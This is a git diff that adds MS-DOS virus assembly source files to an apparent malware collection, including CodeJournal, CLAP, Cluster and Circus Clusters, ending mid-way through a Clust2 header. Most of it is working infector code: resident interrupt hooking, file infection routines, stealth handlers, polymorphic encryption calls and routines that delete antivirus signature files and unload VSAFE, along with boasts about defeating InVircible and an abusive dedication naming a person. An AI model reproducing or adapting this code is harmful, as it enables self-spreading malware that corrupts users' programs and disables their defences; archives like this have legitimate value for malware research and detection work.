a/MSDOS/Virus.MSDOS.Unknown.cj.asm b/MSDOS/Virus.MSDOS.Unknown.cj.asm new file mode 100644 index 00000000..4ebb80c4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cj.asm @@ -0,0 +1,588 @@ +; +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; CodeJournal virus, (c)1995 鹖rogen [NuKE] +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; +; Polymorphic, Resident, Parastic EXE/COM Fast Infector. This is +; another one of my fuck-Invircible viruses. It uses absolutly +; no stealth techniques, yet successfully piggybacks invircible. +; +; Anti-Invircible Code +; ---------------------- +; Completly defeats InVircible's v6.02 Anti-Piggybacking +; Avoids Bait Files +; Doesn't infect InVircible executables +; Deletes Invircible v6.02 signature files no matter what name they have +; Searches for and deletes them on set dir (21h/3Bh) call +; +; The Rest +; ---------------------- +; Polymorphism is 鹖CE v0.5 +; Infects on: Open (3Dh), Rename (56h), Ext. Open (6Ch), Execute (4Bh) +; Doesn't infect executables ending in 'AN', 'OT', 'AV', 'NU', or 'ND'. +; Attempts to get DOS 21h vector by assuming offset is 109Eh in DOS seg. +; Deletes all signature/recovery files known to man +; TBSCAN doesn't flag COM files at all because of my patented JMP construct +; Only subtracts from total memory when DOS allocate memory (49h) is called +; ..and then the usual shit.. +; +; +; +; +cseg segment + assume cs: cseg, ds: cseg, es: cseg, ss: cseg + +signal equ 063ABh +buf_size equ 850 +vice_size equ 1993+buf_size +virus_size equ (offset vend-offset start)+VICE_SIZE +max_iv_size equ 256*66 ; maximum size a signature file + ; can be, speeds up search. + ; can't contain more than 256 + ; records +extrn _vice: near + +org 0h +start: + call get_bp ; get relative offset +nx: + push ds es ; save segments for EXE + + inc si ; SI!=0 + mov ax,signal + int 21h + or si,si + jz no_install + + mov dx,5945h ; remove VSAFE from memory + mov ax,3D02h + add ax,0FA01h-3D02h + int 21h + + mov cs:int_busy[bp],0 ; reset interrupt busy flag + + mov ax,ds ; PSP segment + dec ax ; mcb below PSP m0n + mov ds,ax ; DS=MCB seg + mov al,'Z'+1 ; fuck heuristics + dec al + cmp byte ptr ds: [0],al ; Is this the last MCB in chain? + jnz no_install + sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB + sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP + mov es,word ptr ds: [12h] ; get high mem seg + + push cs + pop ds + mov si,bp + mov cx,virus_size/2+1 + xor di,di + rep movsw ; copy code to new seg + + xor ax,ax + mov ds,ax ; null ds + push ds + lds ax,ds: [21h*4] ; get 21h vector + mov es: word ptr old21+2,ds ; save S:O + mov es: word ptr old21,ax + pop ds + mov ds: [21h*4+2],es ; new int 21h seg + mov ds: [21h*4],offset new21 ; new offset + +no_install: + + pop es ds ; restore ES DS + xor ax,ax ; null regs + xor bx,bx + xor dx,dx + cmp cs: is_exe[bp],1 + jz exe_return + + lea si,org_bytes[bp] ; com return + mov di,0100h ; -restore first bytes + mov cx,3 + rep movsb + + xor di,di + xor si,si + mov cx,100h ; jump back to 100h + push cx +_ret: ret + +exe_return: + xor di,di + xor si,si + mov cx,ds ; calc. real CS + add cx,10h + add word ptr cs: [exe_jump+2+bp],cx + cli + add cx,cs:orgss[bp] ; calc. real SS + mov ss,cx + mov sp,cs:orgsp[bp] ; restore SP + sti + int 3 ; fix prefetch + db 0eah +exe_jump dd 0 +is_exe db 0 + +get_bp: + int 3 + pop bp + push bp + sub bp,offset nx + ret + + +; resident infection function + +infect_file: + cmp ah,6ch+1 ; from extended open? + jnz not_extended + mov dx,si +not_extended: + mov di,dx + + mov al,'.' + mov cx,0FFh + repnz scasb + or cx,cx + jnz got_ext + ret +got_ext: + cmp word ptr [di],'oc' + jz is_exec + cmp word ptr [di],'OC' + jz is_exec + cmp word ptr [di],'xe' + jz is_exec + cmp word ptr [di],'XE' + jz is_exec +is_bad: + ret +is_exec: + cmp word ptr [di-3],'DN' ; *ND + jz is_bad + cmp word ptr [di-3],'NA' ; *AN + jz is_bad + cmp word ptr [di-3],'VA' ; *AV + jz is_bad + cmp word ptr [di-3],'TO' ; *OT + jz is_bad + cmp word ptr [di-3],'UN' ; *NU + jz is_bad + + push ds + xor ax,ax + mov es,ax + lds ax,es: [24h*4] + mov cs: save24ip,ax ; save 24h + mov cs: save24cs,ds + lds ax,es: [21h*4] + mov cs: save21ip,ax ; save 21h + mov cs: save21cs,ds + mov es: [24h*4+2],cs ; write new 24h + mov es: [24h*4],offset new_24 + push es + mov ah,52h ; get DOS segment + int 21h + pop ds + mov si,109Eh ; assume 109Eh + cmp es: [si],09090h ; is DOS vecor? + jnz not_dos + mov ds: [21h*4],si ; write new 21h + mov ds: [21h*4+2],es + + not_dos: + + pop ds + push cs + pop es + + mov al,0 ; get phile attribute + call attrib_file + push cx ; save CX-attrib + + mov al,1 ; null attribs + xor cx,cx + call attrib_file + + mov al,2 + call open_file + jc dont_do + + push cs + pop ds + + mov cx,1ah + lea dx,org_bytes + call read_file + + mov al,0 ; get time/date + call date_file + push cx dx + + cmp byte ptr org_bytes,'M' + jz do_exe + cmp byte ptr org_bytes,90h ; InVircible bait? + jz close + cmp byte ptr org_bytes,0E9h ; us? / invircible bait? + jz close + + mov is_exe,0 + + call offset_end + cmp ax,0FFFFh-virus_size ; file too big? + ja close + push ax ; AX=end of file + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor/ + push di ; encrypted code. (at heap) + mov cx,virus_size ; CX=virus size + mov dx,ax ; DX=EOF offset + add dx,100h ; DX=offset decryptor will run from + mov al,00000011b ; garbage, no CS: + call _vice ; call engine! + + pop dx + call write_file + + call offset_zero + pop ax ; restore COM file size + sub ax,3 ; calculate jmp offset + mov word ptr new_jmp+1,ax + + lea dx,new_jmp + mov cx,3 + call write_file + +close: + pop dx cx ; pop date/time + mov al,01 ; restore the mother fuckers + call date_file + +dont_do: + pop cx ; restore attrib + mov al,1 + call attrib_file + + call close_file + + xor ax,ax + mov es,ax + lds ax,dword ptr cs: save24ip ; restore shitty DOS error handler + mov es: [24h*4],ax + mov es: [24h*4+2],ds + lds ax,dword ptr cs: save21ip + mov es: [21h*4],ax + mov es: [21h*4+2],ds + ret + +do_exe: + + cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0? + jnz close ; could be iv bait if not + cmp byte ptr exe_header[18h],52h ; pklite'd? + jz exe_ok + cmp byte ptr exe_header[18h],40h ; don't infect new format exe + jge close + mov ax,word ptr exe_header[0Ah] ; get minimum memory + cmp word ptr exe_header[0Ch],ax ; if max mem=min mem then ok + jz exe_ok + cmp byte ptr exe_header[0Ch],0FFh ; max memory FFFFh? + jnz close +exe_ok: + push bx + + mov ah,2ch ; grab a random number + int 21h + mov word ptr exe_header[12h],dx ; mark that it's us + mov is_exe,1 + + les ax,dword ptr exe_header[0eh] ; get old SS:SP + mov word ptr orgss,ax ; not reversed + mov word ptr orgsp,es + + les ax,dword ptr exe_header[14h] ; Save old entry point + mov word ptr exe_jump, ax + mov word ptr exe_jump+2, es + + push cs + pop es + + call offset_end + + mov cx,10h ; divide by 16 + div cx + sub ax, word ptr exe_header[8] ; subtract header size + + mov word ptr exe_header[14h],dx ; new cs:ip + mov word ptr exe_header[16h],ax + + inc ax + mov word ptr exe_header[0eh],ax ; new SS + mov word ptr exe_header[10h],0F000h ; new SP + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor & code + mov cx,virus_size ; CX=virus size + mov al,00000010b ; garbage, use CS: + call _vice ; call engine! + + pop bx ; pop handle + mov dx,virus_size + call write_file ; append virus + call offset_end ; get adjusted file size + + mov cx,512 ; divide by 512 + div cx + inc ax ; add a page + + mov word ptr exe_header+4,ax ; save new size + mov word ptr exe_header+2,dx + + call offset_zero + + mov cx,18h ; write fiXed header + lea dx,exe_header + call write_file + + jmp close + +offset_zero: + xor al,al + jmp set_fp +offset_end: + mov al,02h +set_fp: + mov ah,42h + xor cx,cx + xor dx,dx + int 21h + ret + +open_file: + mov ah,3dh + int 21h + xchg ax,bx + ret + +close_file: + mov ah,3eh + int 21h + ret + +read_file: + mov ah,3fh + int 21h + ret + +write_file: + mov ah,40h + int 21h + ret + +attrib_file: + mov ah,43h + int 21h + ret + +date_file: + mov ah,56h + int 21h + ret + +new21: + pushf + cmp ax,signal ; be it us? + jnz nchk ; richtig.. + xor si,si + popf + iret +nchk: + cmp cs:int_busy,1 ; are we already in int? + jz jmp_no_stack + mov cs:int_busy,1 ; now we are + + inc ah ; fuck heuristics + cmp cs: fix_mem,1 ; need to fix memory? + jz add_mem + cmp ah,48h+1 ; allocate memory? + jz sub_mem + cmp ah,3Bh+1 ; set dir? + jz kill_anti_virus + cmp ah,4bh+1 ; execute phile? + jz go_infect + cmp ah,3dh+1 ; open phile? + jz go_infect + cmp ah,6ch+1 ; extended open? + jz go_infect + cmp ah,56h+1 ; rename/move phile? + jnz jmp_org + +go_infect: + call push_regs + call infect_file + call pop_regs +jmp_org: + dec cs:int_busy ; not busy anymore + dec ah ; restore function + +jmp_no_stack: + popf + db 0eah ; jump far XXXX:XXXX + old21 dd 0 + +si_jmp_org: + pop si + jmp jmp_org + + +add_mem: + mov cs: fix_mem,0 + push ax ds + xor ax,ax + mov ds,ax + add byte ptr ds: [413h],((virus_size+1023)*2)/1024 ;+totalmem + pop ds ax + jmp jmp_org +sub_mem: + mov cs: fix_mem,1 + push ax ds + xor ax,ax + mov ds,ax + sub byte ptr ds: [413h],((virus_size+1023)*2)/1024 ;-totalmem + pop ds ax + jmp jmp_org + +kill_anti_virus: + call push_regs + push cs + pop ds + mov ah,2fh ; get DTA + int 21h + push bx es ; save DTA + push cs + pop es + lea dx,ff_info + call set_dta + mov cx,16h ; include all attribs + lea dx,inv_spec + mov ah,4eh + int 21h ; findfirst + jnc inv_loop + jmp inv_done +inv_loop: + lea si,f_name + push si + mov dx,si + cmp word ptr [si+4],'V-' ; ANTI-VIR.DAT? + jz is_anti + cmp word ptr [si+8],'SM' ; CHKLIST.MS? + jz is_anti + cmp word ptr [si+8],'PC' ; CHKLIST.CPS? + jz is_anti + cmp f_sizeh,0 ; high word set? + jnz findnext + cmp f_sizel,max_iv_size ; too big? + jg findnext + mov al,0 + call open_file + jc findnext + mov byte ptr inv_buf,0 + mov cx,44h + lea dx,inv_buf + call read_file + cmp ax,44h + jz record_s + mov ax,word ptr inv_buf + mov word ptr inv_buf[42h],ax +record_s: + call close_file + lea si,inv_buf + call chk_iv ; check first record + jnz findnext + lea si,inv_buf[42h] + call chk_iv ; check second record + jnz findnext +is_anti: + mov al,1 ; reset attribs + xor cx,cx + call attrib_file + mov ah,41h + lea dx,f_name + int 21h +findnext: + mov al,0 ; null out filename + pop di ; di-> fname + mov cl,13 + rep stosb + mov ah,4fh + int 21h + jc inv_done + jmp inv_loop +inv_done: + pop ds dx ; restore DTA + call set_dta +no_kill: + call pop_regs + jmp jmp_org + +set_dta: + mov ah,1ah + int 21h + ret + +chk_iv: + cmp word ptr [si],'ZM' + jz yea_iv + cmp word ptr [si],'KP' + jz yea_iv + cmp word ptr [si],0EA60h +yea_iv: + ret + +push_regs: + mov cs:_bp,bp + pop bp + push ax bx cx di dx si ds es + push bp + ret + +pop_regs: + pop bp + pop es ds si dx di cx bx ax + push bp + mov bp,cs:_bp + ret + +new_24: ; critical error handler + mov al,3 ; prompts suck, return fail + iret + + +inv_spec db '*.*',0 +credits db 'CodeJournal by 鹖rogen [NuKE]' +orgss dw 0 ; original SS:SP in exe +orgsp dw 0 ; +fix_mem db 0 +new_jmp db 0E9h,0,0 ; jmp XXXX +rel_off dw 0 +exe_header: +org_bytes db 0CDh,20h, 6 dup (0) ; original COM bytes | exe hdr +vend: + db 13h dup(0) ; remaining exe header space +save21ip dw 0 ; infected int21h vector +save21cs dw 0 +save24ip dw 0 ; old int24h vector +save24cs dw 0 +_bp dw 0 +int_busy db 0 +ff_info db 26 dup(0) +f_sizel dw 0 +f_sizeh dw 0 +f_name db 13 dup(0) +inv_buf db 44h dup (0) +cseg ends + end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.clap.asm b/MSDOS/Virus.MSDOS.Unknown.clap.asm new file mode 100644 index 00000000..d61a27b0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.clap.asm @@ -0,0 +1,195 @@ +; This Virus is dedicated to Taz - ((Amanda Hugen)) +; Fuck you, Bitch! +; Written by the Weasel! for Sector Infector INC. + + +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +virus_size equ 625 ; Size of the virus file +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +main proc near ; Code execution begins here + jmp random_mutation ; Put the virus into action + +encrypt_val db 00h ; Hold value to encrypt by here + +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + pop bx ; Get back the handle + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + ret ; Go back to where you came from + + +virus_code: +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Error #2693 - Execution Halted$" +virus_msg1 db cr,lf,tab,"Well, gee. What a bummer, it appears you have the CLAP!! $" +virus_msg2 db cr,lf,tab,"Or at least that's what I'm telling you, so you have to believe it! $" +virus_msg3 db cr,lf,tab,"Don't say I never gave you anything! $" +virus_msg4 db cr,lf,tab," -- ADH --$" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,1 ; Are at least 1 file infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h +jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.clust.asm b/MSDOS/Virus.MSDOS.Unknown.clust.asm new file mode 100644 index 00000000..051dfb29 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.clust.asm @@ -0,0 +1,259 @@ +;The Cluster virus is an interesting experiment which works, almost. +;It it what has come to be known as an 'intended' virus, although a +;a very slickly done one. +;Credited to the TridenT virus programming group, Cluster uses some of +;the ideas of the Bulgarian virus known as The Rat. The Rat was deemed +;tricky because it looked for "00" empty space below the header in +;an EXEfile - if it found enough room for itself, it wrote itself out +;to the empty space or "air" in the file. This hid the virus in the +;file, but added no change in file size. This is a nice theme - one +;made famous by the ZeroHunt virus which first did the same with +;.COMfiles. In both cases, the viruses had to be picky about the +;files they infected, limiting their spread. +; +;Cluster is similar to The Rat. It will attempt to copy itself into +;the "air" in an EXEfile just below the file header, if there is +;enough room. The most common candidates for infection are standard +;MS/PC-DOS utility programs, like FIND or FC, among others. +; +;As is Cluster will go resident from the "germ" supplied with the +;newsletter. On copy, if the candidate .EXEfile has enough "00" +;air, Cluster will infect it. In other words, any .EXEfile +;written to will be inspected by Cluster. +; +;Because Cluster installs its own INT 13 disk hander, it then can +;intercept all attempts to open infected files for a quick look. +;For example, looking at a hex dump of a Cluster-infected .EXE, +;with Vern Berg's LIST, will show the files clean. Now, boot +;the system clean and look again. You'll see Cluster in the file's +;"00" space - look for the funny "Zugu" signature. +; +;However, almost all files infected by Cluster under DOS 5.0 and 6.0 +;are mishandled in such way that they cannot execute properly except +;when the virus is not resident. Normally, what happens is Cluster +;will go resident and the system will hang. And this is what is +;meant by an 'intended' virus - Cluster is very infectious, but only +;infectious on a machine which is contaminated with the "germ" file +;supplied by TridenT. Although Cluster may behave better on other +;platforms, it's not viable on most of the systems rolling out +;of shops today. +; +;Additional notes and disassembly are all Black Wolf's. --Urnst Kouch +;Crypt Newsletter 17. +;------------------------------------------------------------------- +;This virus goes memory resident at the top of lower memory and hooks +;Int 13h. Whenever an EXE file header is written, it checks to see +;if there is a large field of 0's inside it (VERY common in EXE's) +;and, if so, will put itself inside it and change the exe marker bytes +;'MZ' to a jump to that code. In this way, it effectively converts the +;file to a COM file when it is run. After this it re-executes the EXE +;file. Because of a stealth handler on Int 13h function 2 (absolute +;disk read) the EXE file is read as it originally was (the handler +;zero's out the field in which it resides and restores the jump to +;'MZ'). Because of the way this virus works, it can only infect +;smaller EXE files. +; +; +;NOTE: +;Several commands are commented out and have the actual bytes entered +;next to them instead. This is because the compiler that Clust was +;originally compiled on used different translations than mine, and +;I wished to preserve the EXACT virus code. + +;Disinfection: Because of this virus' stealth routine, disinfection should +; be possible simply by Zipping or Arjing all EXE files on an +; infected disk, then rebooting from a clean disk and unarchiving +; the files. The original archiving MUST be done while the +; virus is active in memory. Also - after rebooting - make +; sure the program you use to unarchive the files is _NOT_ +; infected. + +;Disassembly by Black Wolf + +.model tiny +.code + org 100h + +start: + jmp short EntryPoint + +LotsaNOPs db 122 dup (90h) ;Usually will be EXE header.... + +OldInt13 dd 0 + +EntryPoint: + db 0e9h,7ch,0 ;jmp InstallVirus + +Int13Handler: + cmp ah,3 + je IsDiskWrite + + cmp ah,2 + jne GoInt13 + + pushf + call cs:OldInt13 ;Call Int 13h + + jc Exit13Handler ;Exit on error. + + cmp word ptr es:[bx],7EEBh ;Is sector infected? + jne Exit13Handler + + mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ' + + push di cx ax ;Stealth routine..... + mov cx,115h + xor ax,ax + db 89h,0dfh ;mov di,bx + + ;Zero out virus from + add di,80h ;sector when it is read. + rep stosb + pop ax cx di + +Exit13Handler: + iret +GoInt13: + jmp cs:[OldInt13] +IsDiskWrite: + cmp word ptr es:[bx],5A4Dh ;Is EXE file being written? + jne GoInt13 + + cmp word ptr es:[bx+4],75h ;Is file too large? + jae GoInt13 + + push ax cx si di ds + push es + pop ds + db 89h,0deh ;mov si,bx + + add si,80h ;Look in EXE header.... + mov cx,115h +AllZeros: + lodsb + cmp al,0 + loopz AllZeros + + cmp cx,0 ;Check to see if entire field + jne ExitInfectHandler ;was zeroed - leave if not. + + + db 89h,0dfh ;mov di,bx + add di,80h + mov cx,115h + mov si,offset OldInt13 + push cs + pop ds + rep movsb + + db 89h,0dfh ;mov di,bx + + ;Copy virus + ;over zero area in EXE header. + mov ax,7EEBh ;Stick in Jump over 'MZ' + stosw + +ExitInfectHandler: + pop ds di si cx ax ;Allow Write to process now. + jmp short GoInt13 + +InstallVirus: + mov ax,3513h + int 21h ;Get Int 13 addres + mov word ptr cs:[OldInt13],bx + mov word ptr cs:[OldInt13+2],es + + mov ah,0Dh + int 21h ;Flush disk buffers + + mov ah,36h + mov dl,0 + int 21h ;Get free space on default drive + + mov ax,cs + dec ax + mov ds,ax + cmp byte ptr ds:0,'Z' ;Are we the last chain? + jne Terminate ;If not, terminate. + + ;sub word ptr ds:[3],39h ;subtract from MCB size + db 81h,2eh,03,0,39h,0 + + ;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem + db 81h,2eh,12h,0,39h,0 + + mov si,offset OldInt13 + + db 89h,0f7h ;mov di,si + + mov es,ds:[12h] ;ES = new segment + push cs + pop ds + mov cx,115h ;Copy virus into memory + rep movsb + + mov ax,2513h + push es + pop ds + mov dx,offset Int13Handler + int 21h ;Set int 13 to virus handler + + mov ah,4Ah + push cs + pop es + mov bx,39h + int 21h ;Modify mem alloc. + + push cs + pop ds + mov bx,ds:[2ch] ;Get environment segment + mov es,bx + xor ax,ax + mov di,1 + +ScanForFilename: ;Find name of file executed + dec di ;in environment strings... + scasw ;(located after two 0's) + jnz ScanForFilename + + lea si,[di+2] + push bx + pop ds ;DS = environment segment + + push cs + pop es ;ES = code segment + + mov di,offset Filename + push di + xor bx,bx + +CopyFilename: + mov cx,50h + inc bx + lodsb + cmp al,0 + jne StoreFilename ;Change zero at end of + mov al,0Dh ;filename to a return + +StoreFilename: + stosb + cmp al,0Dh ;If it was a return, we're + loopnz CopyFilename ;done copying the filename + + mov byte ptr ds:[28fh],bl + push cs + pop ds + pop si + dec si + int 2Eh ;Re-execute EXE file with + ;Stealth handler in memory, + ;so Exe is run w/o virus. + ;here we go, infected program +Terminate: ;only executes properly when + mov ah,4Ch ;Cluster is resident. + int 21h + + db 0 +Filename db 1 + +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cluster1.asm b/MSDOS/Virus.MSDOS.Unknown.cluster1.asm new file mode 100644 index 00000000..dba46cd2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cluster1.asm @@ -0,0 +1,176 @@ +; +; Circus Clusters by John Tardy +; +; This virus is a purely research virus and will not be very able to spread +; itself. It only infects .EXE files smaller than 64K and have a very small +; relocation header, so it can hide itself there. It is fully stealth and it +; only occupies 273 bytes (512-273=239 bytes left for the exe header and the +; relocation table, which ain't much). However, it is functional and can +; spread itself if the criteria files are aveable. If this virus is enhanced, +; it could be a serious threath to the antiviral community. +; + Org 100h + +Jumpie: Jmp Short Jumper + + Org 17ch + +Old13 DD 0 +Jumper: Jmp Install +New13: Cmp Ah,3 + Je CheckExe + Cmp Ah,2 + Jne Org13 + + Pushf + Call Dword Ptr Cs:[Old13] + Jc Error + Cmp Word Ptr Es:[Bx],7eebh + Jne error + Mov Word Ptr Es:[Bx],'ZM' + Push Di + Push Cx + Push Ax + + Mov Cx,VirLen + Xor Ax,Ax + Mov Di,Bx + Add Di,80h + Rep Stosb + + Pop Ax + Pop Cx + Pop Di +Error: Iret +Org13: Jmp Dword Ptr Cs:[Old13] +CheckExe: + Cmp Word Ptr Es:[Bx],'ZM' ; EXE file? + Jne Org13 ; No do normal INT13 + + Cmp Word Ptr Es:[Bx][4],(60000/512) ; Is it too long? + Jnb Org13 ; Yes do normal INT13 + + Push Ax + Push Cx + Push Si + Push Di + Push Ds + + Push Es + Pop Ds + Mov Si,Bx + Add Si,80h + Mov Cx,VirLen +Find0: Lodsb + Cmp Al,0 + Loope Find0 + Cmp Cx,0 + Jne No0 + + Mov Di,Bx + Add Di,80h + Mov Cx,VirLen + Lea Si,Old13 + Push Cs + Pop Ds + Rep Movsb + Mov Di,Bx + Mov Ax,07eebh + Stosw + +No0: + Pop Ds + Pop Di + Pop Si + Pop Cx + Pop Ax + Jmp Org13 +Install: + Mov Ax,3513h + Int 21h + Mov Word Ptr Cs:Old13[0],Bx + Mov Word Ptr Cs:Old13[2],Es + + mov ah,0dh + int 21h + mov ah,36h + mov dl,0 + int 21h + + mov ax,cs ;adjust memory-size + dec ax + mov ds,ax + cmp byte ptr ds:[0],'Z' + jne quitit +resit: sub word ptr ds:[3],virpar+20h + sub word ptr ds:[12h],VirPar+20h + lea si,old13 + mov di,si + mov es,ds:[12h] + mov ds,cs + mov cx,virlen + rep movsb + + Mov Ax,2513h + Mov Ds,es + Lea Dx,New13 + Int 21h + + Mov Ah,4ah + Push Cs + Pop Es + Mov Bx,VirPar+20h + Int 21h + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + mov es,bx + xor ax,ax + mov di,1 + +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename +Exec: push bx + pop ds + push cs + pop es + + mov di,offset f_name ; copy name of this file + push di + xor bx,bx +movit: mov cx,80 + inc bx + lodsb + cmp al,0 + jne stor + mov al,0dh +stor: stosb + cmp al,0dh + loopne movit + mov f_len,bl + + push cs + pop ds + + pop si + dec si + Int 2eh + +quitit: mov ah,4ch + int 21h + +f_len db 0 +f_name: db 1 + +VirEnd Equ $ +VirLen Equ $-Old13 +VirPar Equ ($-Jumpie)/16 + + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <哪哪哪哪哪哪哪 +; 哪哪哪哪哪> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.cluster2.asm b/MSDOS/Virus.MSDOS.Unknown.cluster2.asm new file mode 100644 index 00000000..11987952 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cluster2.asm @@ -0,0 +1,249 @@ +; +; Clust2 virus by John Tardy / TridenT +; +; Virus Name: Clust2 +; Aliases: Cluster-II, Circus Clusters-II +; V Status: Released +; Discovery: Not (yet) +; Symptoms: .EXE altered, possible "sector not found" errors on disk-drives, +; decrease in aveable memory +; Origin: The Netherlands +; Eff Length: 386 bytes (EXE size doesn't change) +; Type Code: ORhE - Overwriting Resident .EXE Infector +; Detection Method: +; Removal Instructions: Delete infected files or copy infected files with the +; virus resident to a device driven unit. +; +; General Comments: +; The Clust2 virus is not yet submitted to any antiviral authority. It +; is from the TridenT Virus Research Centre and was written by someone +; calling himself John Tardy. When an infected program is started, Clust2 +; will become resident in high memory, but below TOM. It hooks interrupt +; 13h and will try to load the program again. Because of it's stealth +; abilities the original program is loaded and will execute normally. +; The Clust2 virus infects files when a write request for interrupt 13h +; is done. It will check if the 